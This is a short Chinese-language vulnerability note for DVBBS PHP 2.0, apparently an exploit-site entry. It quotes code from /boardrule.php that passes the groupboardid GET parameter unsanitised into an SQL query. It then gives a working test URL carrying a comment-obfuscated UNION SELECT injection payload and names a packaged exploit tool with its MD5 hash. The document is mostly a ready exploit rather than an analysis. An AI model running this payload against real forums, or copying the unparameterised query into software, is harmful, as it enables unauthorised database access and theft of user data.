|
影响版本:2.0
漏洞文件:/boardrule.php
相关代码:
function brule() {
global $dv,$db,$boardid,$lang,$groupboardid;
$groupboardid=$_GET['groupboardid'];
if(!empty($_GET['groupboardid'])){
$rules=$db->scalar(\"select rules from {$dv}group_board where id={$groupboardid}\");
}
else{
$rules=$db->scalar(\"select rules from {$dv}board where boardid={$boardid}\");
}
直接获得变量groupboardid,不为空就直接带入查询导致注入。
测试:http://dvbbsroot/boardrule.php?groupboardid=111111111/**/union/**/select/**/version()/*
利用工具 dvbbs_php2.0_**er_.exe MD5 : 6b931f8e00e90cf4b1faa531a59d4b36 |
|